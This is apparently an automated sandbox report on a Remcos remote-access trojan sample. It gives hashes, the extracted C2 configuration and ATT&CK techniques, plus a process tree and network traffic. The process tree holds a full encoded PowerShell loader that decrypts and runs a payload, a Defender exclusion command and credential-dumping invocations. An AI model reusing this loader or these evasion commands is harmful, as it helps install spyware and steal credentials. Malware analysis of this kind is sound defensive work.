remcos | 4f20e2ea3367ba6193bd966e8282aa4b2c0d5047283543ac17382421465cd5b9

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
15/05/2024, 23:40 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PEDIDO#140404-AB2324.exe
Size

1.3MB
MD5

5632476c595eec38bc4fdf29848521c0
SHA1

d56e3c24341e207fe9cec9742a135df0a66796e4
SHA256

fb9154259baeba38fcb25fae2d53b8b498a68d451478d067d04e849606f33c6e
SHA512

c96e708b3b33d242be36c2e65a52d1f7da04b833aeddcd7e4e93dd136b92cff82bffca032fca40f3544809368ff86517c868db13110138bf17c423ac69045a80
SSDEEP

24576:O4WXhHQqP1synFS5noo7971QJL8+Ra6uEwkvLBA03W:Ojd9P1syn/oR71QJZRNuEwkvLd3W

Score

10^/10

remcos logss collection evasion execution rat trojan

Malware Config

Extracted

Family

remcos

Botnet

LOGSS

64.188.26.204:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-5AMF0U
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe

Windows security bypass 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\PEDIDO#140404-AB2324.exe = "0"	powershell.exe

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/3988-52-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 2 IoCs

resource	yara_rule
behavioral2/memory/4336-50-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/3988-52-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2024	powershell.exe
3964	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	aspnet_wp.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2024 set thread context of 4088	2024	powershell.exe	103
PID 4088 set thread context of 3988	4088	aspnet_wp.exe	107
PID 4088 set thread context of 2140	4088	aspnet_wp.exe	108
PID 4088 set thread context of 4336	4088	aspnet_wp.exe	109

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
2024	powershell.exe
2024	powershell.exe
2024	powershell.exe
2024	powershell.exe
2024	powershell.exe
2024	powershell.exe
2024	powershell.exe
2024	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
4336	aspnet_wp.exe
4336	aspnet_wp.exe
3988	aspnet_wp.exe
3988	aspnet_wp.exe
3988	aspnet_wp.exe
3988	aspnet_wp.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
4088	aspnet_wp.exe
4088	aspnet_wp.exe
4088	aspnet_wp.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	4336	aspnet_wp.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 4548 wrote to memory of 2024	4548	PEDIDO#140404-AB2324.exe	84
PID 4548 wrote to memory of 2024	4548	PEDIDO#140404-AB2324.exe	84
PID 2024 wrote to memory of 3964	2024	powershell.exe	97
PID 2024 wrote to memory of 3964	2024	powershell.exe	97
PID 2024 wrote to memory of 1216	2024	powershell.exe	99
PID 2024 wrote to memory of 1216	2024	powershell.exe	99
PID 2024 wrote to memory of 1216	2024	powershell.exe	99
PID 2024 wrote to memory of 1216	2024	powershell.exe	99
PID 2024 wrote to memory of 1216	2024	powershell.exe	99
PID 2024 wrote to memory of 1216	2024	powershell.exe	99
PID 2024 wrote to memory of 1216	2024	powershell.exe	99
PID 2024 wrote to memory of 1216	2024	powershell.exe	99
PID 2024 wrote to memory of 1216	2024	powershell.exe	99
PID 2024 wrote to memory of 1216	2024	powershell.exe	99
PID 2024 wrote to memory of 2304	2024	powershell.exe	100
PID 2024 wrote to memory of 2304	2024	powershell.exe	100
PID 2024 wrote to memory of 2304	2024	powershell.exe	100
PID 2024 wrote to memory of 2304	2024	powershell.exe	100
PID 2024 wrote to memory of 2304	2024	powershell.exe	100
PID 2024 wrote to memory of 2304	2024	powershell.exe	100
PID 2024 wrote to memory of 2304	2024	powershell.exe	100
PID 2024 wrote to memory of 2304	2024	powershell.exe	100
PID 2024 wrote to memory of 2304	2024	powershell.exe	100
PID 2024 wrote to memory of 2304	2024	powershell.exe	100
PID 2024 wrote to memory of 3804	2024	powershell.exe	101
PID 2024 wrote to memory of 3804	2024	powershell.exe	101
PID 2024 wrote to memory of 3804	2024	powershell.exe	101
PID 2024 wrote to memory of 4088	2024	powershell.exe	103
PID 2024 wrote to memory of 4088	2024	powershell.exe	103
PID 2024 wrote to memory of 4088	2024	powershell.exe	103
PID 2024 wrote to memory of 4088	2024	powershell.exe	103
PID 2024 wrote to memory of 4088	2024	powershell.exe	103
PID 2024 wrote to memory of 4088	2024	powershell.exe	103
PID 2024 wrote to memory of 4088	2024	powershell.exe	103
PID 2024 wrote to memory of 4088	2024	powershell.exe	103
PID 2024 wrote to memory of 4088	2024	powershell.exe	103
PID 2024 wrote to memory of 4088	2024	powershell.exe	103
PID 2024 wrote to memory of 4088	2024	powershell.exe	103
PID 2024 wrote to memory of 4088	2024	powershell.exe	103
PID 4088 wrote to memory of 3988	4088	aspnet_wp.exe	107
PID 4088 wrote to memory of 3988	4088	aspnet_wp.exe	107
PID 4088 wrote to memory of 3988	4088	aspnet_wp.exe	107
PID 4088 wrote to memory of 3988	4088	aspnet_wp.exe	107
PID 4088 wrote to memory of 2140	4088	aspnet_wp.exe	108
PID 4088 wrote to memory of 2140	4088	aspnet_wp.exe	108
PID 4088 wrote to memory of 2140	4088	aspnet_wp.exe	108
PID 4088 wrote to memory of 2140	4088	aspnet_wp.exe	108
PID 4088 wrote to memory of 4336	4088	aspnet_wp.exe	109
PID 4088 wrote to memory of 4336	4088	aspnet_wp.exe	109
PID 4088 wrote to memory of 4336	4088	aspnet_wp.exe	109
PID 4088 wrote to memory of 4336	4088	aspnet_wp.exe	109

C:\Users\Admin\AppData\Local\Temp\PEDIDO#140404-AB2324.exe
"C:\Users\Admin\AppData\Local\Temp\PEDIDO#140404-AB2324.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkABIEQAQ1BDwENQQ9BD0EMARPBB8EMAQ/BDoEMAQgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJAAoBDAEMQQ7BD4EPQQgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAEgRABDUEPAQ1BD0EPQQwBE8EHwQwBD8EOgQwBCAALQBGAGkAbAB0AGUAcgAgACQAKAQwBDEEOwQ+BD0EIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAHsACgAgACAAIAAgAHAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAGgQ7BE4ERwQsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABgEPQQ4BEYEOAQwBDsEOAQ3BDgEQARDBE4ESQQ4BDkEEgQ1BDoEQgQ+BEAELAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAAUBDAEPQQ9BEsENQQKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAgACAAIAAgACQAKAQ4BEQEQAQwBEIEPgRABC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BCAAPQAgACQAKAQ4BEQEQAQwBEIEPgRABC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkABoEOwROBEcELAAgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQpAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQgAD0AIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAFAQwBD0EPQRLBDUELAAgADAALAAgACQAFAQwBD0EPQRLBDUELgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQKAH0ACgAKACQAGgQ7BE4ERwQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABCAEUALAAgADAAeABEAEYALAAgADAAeABCADgALAAgADAAeABBAEUALAAgADAAeABCADYALAAgADAAeAAxAEQALAAgADAAeABGADAALAAgADAAeABBAEUALAAgADAAeAAzAEEALAAgADAAeAA2AEEALAAgADAAeAA4AEMALAAgADAAeAAzAEYALAAgADAAeAAwADkALAAgADAAeABBAEEALAAgADAAeAA3ADMALAAgADAAeAAxADgALAAgADAAeAA3ADIALAAgADAAeAA0ADAALAAgADAAeAAzAEYALAAgADAAeAAzAEEALAAgADAAeAAxAEYALAAgADAAeAA0ADkALAAgADAAeAAxAEEALAAgADAAeAA5ADMALAAgADAAeAAwAEMALAAgADAAeABFAEYALAAgADAAeAAyADIALAAgADAAeAA5ADMALAAgADAAeABGADAALAAgADAAeAAwADAALAAgADAAeAAyADcALAAgADAAeAAyADAAKQAKACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABDAEMALAAgADAAeABCAEYALAAgADAAeAAxADYALAAgADAAeAA5AEYALAAgADAAeAAxADcALAAgADAAeABBADMALAAgADAAeAA3AEQALAAgADAAeAA1ADgALAAgADAAeAA3ADAALAAgADAAeAA4AEIALAAgADAAeAAzADIALAAgADAAeAA0AEMALAAgADAAeAA3ADgALAAgADAAeAA0ADAALAAgADAAeAA4AEUALAAgADAAeABFAEMAKQAKAAoAaQBmACAAKAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAKACAAIAAgACAAJAAfBEMEQgRMBCQEMAQ5BDsEMAQgAD0AIAAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsELgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAFwQwBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQRBDAEOQRCBEsEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAB8EQwRCBEwEJAQwBDkEOwQwBCkAOwAKACAAIAAgACAAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQgAD0AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAC0AGgQ7BE4ERwQgACQAGgQ7BE4ERwQgAC0AGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAC0AFAQwBD0EPQRLBDUEIAAkABcEMARIBDgERARABD4EMgQwBD0EPQRLBDUEEQQwBDkEQgRLBAoACgAgACAAIAAgACQAIQQxBD4EQAQ6BDAEIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAFsAYgB5AHQAZQBbAF0AXQBAACgAJAAgBDAEQQRIBDgERARABD4EMgQwBD0EPQQ+BDUEIQQ+BDQENQRABDYEOAQ8BD4ENQQpACkAOwAKACAAIAAgACAAJAAiBD4ERwQ6BDAEEgRFBD4ENAQwBCAAPQAgACQAIQQxBD4EQAQ6BDAELgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQAIgQ+BEcEOgQwBBIERQQ+BDQEMAQuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQA7AAoAfQAKAA==
  2⤵
  - UAC bypass
  - Windows security bypass
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\PEDIDO#140404-AB2324.exe" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3964
- - C:\Windows\System32\svchost.exe
    "C:\Windows\System32\svchost.exe"
    3⤵
    PID:1216
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    3⤵
    PID:2304
- - C:\Program Files (x86)\Windows Mail\wab.exe
    "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    PID:3804
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:4088
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe /stext "C:\Users\Admin\AppData\Local\Temp\czdvszxioagoolnhkapipoa"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3988
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe /stext "C:\Users\Admin\AppData\Local\Temp\nbiftjikciytyrbltlcbztvzrr"
      4⤵
      Accesses Microsoft Outlook accounts
      PID:2140
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe /stext "C:\Users\Admin\AppData\Local\Temp\pvoytctdqqqybfxplwwdcgqqsxfbl"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4336

Network

DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

0.204.248.87.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.204.248.87.in-addr.arpa

IN PTR

Response

0.204.248.87.in-addr.arpa

IN PTR

https-87-248-204-0lhrllnwnet
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

204.79.197.237

dual-a-0034.a-msedge.net

IN A

13.107.21.237
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GcChcGghRnDciWfBaJ34ETVUCUzlSRlB1ncXA0cqtQIXpKtbQep99ue5x2eBV6nuYBD_-fhpt9ap4kJkyfOj-UH_A3X3CfPFYoLaT8Vv3-FVPR-6WHPTuddiVwlTop-Em3jc0HD0yFX1gOIrasb91Wuk0OwS4BYz6nX0lPsba9sdB5K-%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D5eec9d228a8c10cfe0effb19ecb10def&TIME=20240508T114808Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GcChcGghRnDciWfBaJ34ETVUCUzlSRlB1ncXA0cqtQIXpKtbQep99ue5x2eBV6nuYBD_-fhpt9ap4kJkyfOj-UH_A3X3CfPFYoLaT8Vv3-FVPR-6WHPTuddiVwlTop-Em3jc0HD0yFX1gOIrasb91Wuk0OwS4BYz6nX0lPsba9sdB5K-%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D5eec9d228a8c10cfe0effb19ecb10def&TIME=20240508T114808Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=062DB402C41D65143CEAA082C53A6415; domain=.bing.com; expires=Mon, 09-Jun-2025 23:40:25 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6A2FECA933D4451094214A8CCE0D975D Ref B: LON04EDGE0710 Ref C: 2024-05-15T23:40:25Z
date: Wed, 15 May 2024 23:40:25 GMT
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GcChcGghRnDciWfBaJ34ETVUCUzlSRlB1ncXA0cqtQIXpKtbQep99ue5x2eBV6nuYBD_-fhpt9ap4kJkyfOj-UH_A3X3CfPFYoLaT8Vv3-FVPR-6WHPTuddiVwlTop-Em3jc0HD0yFX1gOIrasb91Wuk0OwS4BYz6nX0lPsba9sdB5K-%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D5eec9d228a8c10cfe0effb19ecb10def&TIME=20240508T114809Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8GcChcGghRnDciWfBaJ34ETVUCUzlSRlB1ncXA0cqtQIXpKtbQep99ue5x2eBV6nuYBD_-fhpt9ap4kJkyfOj-UH_A3X3CfPFYoLaT8Vv3-FVPR-6WHPTuddiVwlTop-Em3jc0HD0yFX1gOIrasb91Wuk0OwS4BYz6nX0lPsba9sdB5K-%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D5eec9d228a8c10cfe0effb19ecb10def&TIME=20240508T114809Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=062DB402C41D65143CEAA082C53A6415; _EDGE_S=SID=2C74421F9FBB6C7B2B3D569F9E116DA9

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=tNZPGL4tn6fFZIjJFxlHi6MuT3jkcVUaCmVcre1dicw; domain=.bing.com; expires=Mon, 09-Jun-2025 23:40:26 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8AEBCB3257C44311AC0C33E11E6A2621 Ref B: LON04EDGE0710 Ref C: 2024-05-15T23:40:25Z
date: Wed, 15 May 2024 23:40:25 GMT
GET

https://www.bing.com/aes/c.gif?RG=5175af0c1d664956b49ad21f383d055b&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T114809Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981

Remote address:

88.221.83.187:443

Request

GET /aes/c.gif?RG=5175af0c1d664956b49ad21f383d055b&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T114809Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=062DB402C41D65143CEAA082C53A6415

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7461B205BA404B328F74A25CC08A3046 Ref B: DUS30EDGE0911 Ref C: 2024-05-15T23:40:25Z
content-length: 0
date: Wed, 15 May 2024 23:40:25 GMT
set-cookie: _EDGE_S=SID=2C74421F9FBB6C7B2B3D569F9E116DA9; path=/; httponly; domain=bing.com
set-cookie: MUIDB=062DB402C41D65143CEAA082C53A6415; path=/; httponly; expires=Mon, 09-Jun-2025 23:40:25 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.b753dd58.1715816425.f702bad
DNS

23.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.159.190.20.in-addr.arpa

IN PTR

Response
DNS

237.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.197.79.204.in-addr.arpa

IN PTR

Response
GET

https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

Remote address:

88.221.83.187:443

Request

GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
host: www.bing.com
accept: */*
cookie: MUID=062DB402C41D65143CEAA082C53A6415; _EDGE_S=SID=2C74421F9FBB6C7B2B3D569F9E116DA9; MSPTC=tNZPGL4tn6fFZIjJFxlHi6MuT3jkcVUaCmVcre1dicw; MUIDB=062DB402C41D65143CEAA082C53A6415
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1107
date: Wed, 15 May 2024 23:40:26 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.b753dd58.1715816426.f702e2f
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

187.83.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

187.83.221.88.in-addr.arpa

IN PTR

Response

187.83.221.88.in-addr.arpa

IN PTR

a88-221-83-187deploystaticakamaitechnologiescom
DNS

204.26.188.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

204.26.188.64.in-addr.arpa

IN PTR

Response

204.26.188.64.in-addr.arpa

IN PTR

6418826204static quadranetcom
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

geoplugin.net

aspnet_wp.exe

Remote address:

8.8.8.8:53

Request

geoplugin.net

IN A

Response

geoplugin.net

IN A

178.237.33.50
GET

http://geoplugin.net/json.gp

aspnet_wp.exe

Remote address:

178.237.33.50:80

Request

GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

date: Wed, 15 May 2024 23:40:39 GMT
server: Apache
content-length: 956
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
DNS

50.33.237.178.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.33.237.178.in-addr.arpa

IN PTR

Response

50.33.237.178.in-addr.arpa

IN CNAME

50.32/27.178.237.178.in-addr.arpa
DNS

26.165.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

